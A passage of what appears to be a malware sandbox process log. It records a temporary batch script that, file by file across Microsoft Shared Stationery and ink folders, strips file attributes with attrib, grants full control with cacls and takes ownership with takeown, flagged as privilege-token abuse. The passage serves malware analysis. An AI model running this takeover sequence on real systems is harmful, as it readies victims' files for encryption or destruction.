- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg""
  2⤵
  PID:1856
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg"
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg" /E /G Admin:F /C
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1780
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg""
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg"
    3⤵
    PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg" /E /G Admin:F /C
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg""
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg"
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg" /E /G Admin:F /C
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg"
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg" /E /G Admin:F /C
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg""
  2⤵
  PID:656
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg"
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg" /E /G Admin:F /C
    3⤵
    PID:612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg""
  2⤵
  PID:1324
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg" /E /G Admin:F /C
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg""
  2⤵
  PID:1488
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg"
    3⤵
    - Views/modifies file attributes
    PID:1460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg" /E /G Admin:F /C
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg""
  2⤵
  PID:1040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg"
    3⤵
    PID:816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg" /E /G Admin:F /C
    3⤵
    PID:388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg""
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg"
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1792
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg""
  2⤵
  PID:1776
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg"
    3⤵
    - Views/modifies file attributes
    PID:1332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg" /E /G Admin:F /C
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg"
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg""
  2⤵
  PID:1988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tanspecks.jpg""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tanspecks.jpg"
    3⤵
    PID:332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tanspecks.jpg" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tanspecks.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg""
  2⤵
  PID:2040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg"
    3⤵
    - Drops file in Program Files directory
    PID:1112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg" /E /G Admin:F /C
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.jpg""
  2⤵
  PID:836
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.jpg"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.jpg" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg""
  2⤵
  PID:1460
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg" /E /G Admin:F /C
    3⤵
    PID:1536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg""
  2⤵
  PID:816
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg"
    3⤵
    - Views/modifies file attributes
    PID:1824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg""
  2⤵
  PID:1812
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg"
    3⤵
    PID:1216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg" /E /G Admin:F /C
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg""
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg"
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg" /E /G Admin:F /C
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Peacock.jpg""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Peacock.jpg"
    3⤵
    - Views/modifies file attributes
    PID:1904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Peacock.jpg" /E /G Admin:F /C
    3⤵
    PID:812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Peacock.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1908
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Roses.jpg""
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Roses.jpg"
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Roses.jpg" /E /G Admin:F /C
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Roses.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg""
  2⤵
  PID:332
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg" /E /G Admin:F /C
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\SoftBlue.jpg""
  2⤵
  PID:1112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\SoftBlue.jpg"
    3⤵
    PID:620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\SoftBlue.jpg" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\SoftBlue.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg""
  2⤵
  PID:1948
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg"
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg" /E /G Admin:F /C
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml""
  2⤵
  PID:1064
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml"
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml" /E /G Admin:F /C
    3⤵
    PID:788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui""
  2⤵
  PID:1820
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1832
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\tipresx.dll.mui""
  2⤵
  PID:1792
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\tipresx.dll.mui"
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\Content.xml""
  2⤵
  PID:1780
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\Content.xml"
    3⤵
    - Views/modifies file attributes
    PID:1692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\Content.xml" /E /G Admin:F /C
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\Content.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\tipresx.dll.mui""
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\tipresx.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\tipresx.dll.mui""
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\tipresx.dll.mui"
    3⤵
    PID:904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\tipresx.dll.mui""
  2⤵
  PID:1976
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\tipresx.dll.mui"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\tipresx.dll.mui""
  2⤵
  PID:612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\tipresx.dll.mui"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi""
  2⤵
  PID:1324
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi" /E /G Admin:F /C
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi""
  2⤵
  PID:1536
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi"
    3⤵
    - Views/modifies file attributes
    PID:676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi" /E /G Admin:F /C
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi""
  2⤵
  PID:1860
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi"
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi" /E /G Admin:F /C
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi""
  2⤵
  PID:1768
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi" /E /G Admin:F /C
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi""
  2⤵
  PID:1432
- - C:\Windows\SysWOW64\attrib.exe
